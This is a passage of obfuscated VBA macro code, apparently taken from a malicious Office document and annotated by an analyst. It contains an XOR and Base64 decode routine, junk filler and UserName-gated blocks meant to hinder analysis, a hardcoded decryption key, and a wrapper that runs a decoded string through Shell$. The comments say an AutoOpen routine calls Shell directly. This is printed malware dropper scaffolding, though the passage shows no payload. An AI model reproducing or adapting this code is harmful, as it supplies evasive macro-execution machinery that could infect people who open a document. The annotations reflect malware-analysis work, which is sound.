If fUKaHihfTNA < Len(Application.UserName) Then
Dim ieHIZeiXsauNXZmMZp As Integer
ieHIZeiXsauNXZmMZp = 8 - 4 * 5
Dim xqtGXUyTwTUVTT As Variant
End If
' Key string -> one byte per character.
oGrqPCJBHHSApVIr = StrConv(tivmdQSaAdYHE, vbFromUnicode)
Dim dcDswfGNJcK As Integer
dcDswfGNJcK = 7 - 5 * 2
' Last valid index of the data array.
UTOJNszvSlDvulxA = UBound(aNYhentkPUlP)
Dim fmSfbqVWcXXZJvDZ As Integer
fmSfbqVWcXXZJvDZ = 6 - 6 * 1
' Last valid index of the key array.
ImdrIInUtnxAx = UBound(oGrqPCJBHHSApVIr)
Dim YxvuFydBOOaeGEzVV As Integer
YxvuFydBOOaeGEzVV = 6
Dim tkoUTIxmcGlJsiR: tkoUTIxmcGlJsiR = Array("lwEkkkkuoaeqSojW""JfzqhEJDifnJTeauXtR""xsagPGEiKIhmiRAxmNo""GUBmdyfdDVzaArlSO""rcmPCtITMNUbkfedQi")
If YxvuFydBOOaeGEzVV < Len(Application.UserName) Then
Dim YVRVlvZYlBrHaPHF As Variant
End If
' XOR each data byte in place with the current key byte.
For TrPZXGuJzfD = 0 To UTOJNszvSlDvulxA
Dim sMjilOPeYkTJBUQiJsb As Integer
sMjilOPeYkTJBUQiJsb = 4 * 4
aNYhentkPUlP(TrPZXGuJzfD) = aNYhentkPUlP(TrPZXGuJzfD) Xor oGrqPCJBHHSApVIr(DlKDTqguNOPgGGWlJAH)
Dim oaWhiuFBNAbuRClGIh: oaWhiuFBNAbuRClGIh = Array("btlLdSLSebOpGwptv""HRUQWgHmXvhMo""PBFLIyHmScnqjVHtdN""ZMWfuLRdgMRhJTfXq""fvLxCyubkukHCkO")
' Advance the key index, wrapping to 0 after the last key byte has been used.
If DlKDTqguNOPgGGWlJAH < ImdrIInUtnxAx Then
Dim MImwiUTaiiskdrnT As Integer
MImwiUTaiiskdrnT = 7 - 5 * 6
DlKDTqguNOPgGGWlJAH = DlKDTqguNOPgGGWlJAH + 1
Else
Dim viBxQFdaiVw, jDcoCSpLWlGGTC As Integer
viBxQFdaiVw = 5
jDcoCSpLWlGGTC = 28
While viBxQFdaiVw < jDcoCSpLWlGGTC
jDcoCSpLWlGGTC = jDcoCSpLWlGGTC - viBxQFdaiVw
Wend
DlKDTqguNOPgGGWlJAH = 0
Dim GkmEcrzEGfsCz: GkmEcrzEGfsCz = Array("cKggodqVupFIX""dBYIbBJUTQatbmbTQ""iPRfuIKHpswqZMW")
End If
Dim UefNWljajbdpAMZjDL As Integer
UefNWljajbdpAMZjDL = 4 * 6
Next TrPZXGuJzfD
Dim nHpPGKtpXQq As Integer
nHpPGKtpXQq = 9
Dim DxZBdQiBOxWLfK As Integer
DxZBdQiBOxWLfK = 1
Dim JXRNLIwTjLqckrEMFqx As Integer
JXRNLIwTjLqckrEMFqx = 6 - 1 * 3
' Filler blocks gated on the user-name length.
If DxZBdQiBOxWLfK < Len(Application.UserName) Then
Dim lXANhPThgSEVyym As Integer
lXANhPThgSEVyym = 7 * 5
Dim dPqGoDEgpeBn As Variant
End If
If nHpPGKtpXQq < Len(Application.UserName) Then
Dim RJFZpKAMaSDpCDxb As Integer
RJFZpKAMaSDpCDxb = 7 * 9
Dim XjmMUCOyFRnIYNad As Variant
End If
' Result: the XORed bytes as a VBA string.
VWSWKMPYtattOHpeXW = StrConv(aNYhentkPUlP, vbUnicode)
End Function



Attribute VB_Name = "ZhjKqcXuixfG"
Attribute VB_Base = "0{D01EDEEE-AD96-4B56-A4C2-A6AAE6B7BEEC}{18C297E6-4E0E-41FC-A5E5-CD9CBB0A3179}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Returns the literal "OBJECTHERE" run through the same Base64-then-XOR decode chain
' and key that AutoOpen uses.
' NOTE(review): "OBJECTHERE" looks like a template placeholder that was never filled
' in, which would make this a leftover of the tool that generated the macro - an
' inference from the literal only, to be confirmed. No call to this function appears
' in the listing shown.
Public Function edIfCsfPNNFA() As String
edIfCsfPNNFA = VWSWKMPYtattOHpeXW(IMkIsXtByMF("OBJECTHERE"), "jkflsdajioT@#$*(T$G@IERajklgasdnklbvdfnsklsdfujr3209t31-=0t42-t934t=95e-iwsujdpjfklbvjcxn,dfsjlk9T$#*GAWI*@TG$*(TG#(T(@))@$)$@#(T#)(T$(#T#(GREIGREIRGE)(@$)T)$#T)#$%(%#I%Y#(I%$YIGTRISFGIDS(T$#(ITERITR#T$IT#$UI#T$")
End Function
' Thin wrapper that passes its string argument to Shell.
' The function never assigns its own name, so it returns the Long default.
' No call to this function appears in the listing shown; AutoOpen invokes Shell
' directly instead. It is still a second Shell call site that the OLE_VBA_SHELL
' heuristic would match.
Public Function RdFRwvoLGoM(RboUBedmmMCegZKE As String) As Long
' Filler assignment, result unused.
Dim bNJRSQqARuRCY As Integer
bNJRSQqARuRCY = 7 - 3 * 1
Shell$ RboUBedmmMCegZKE
End Function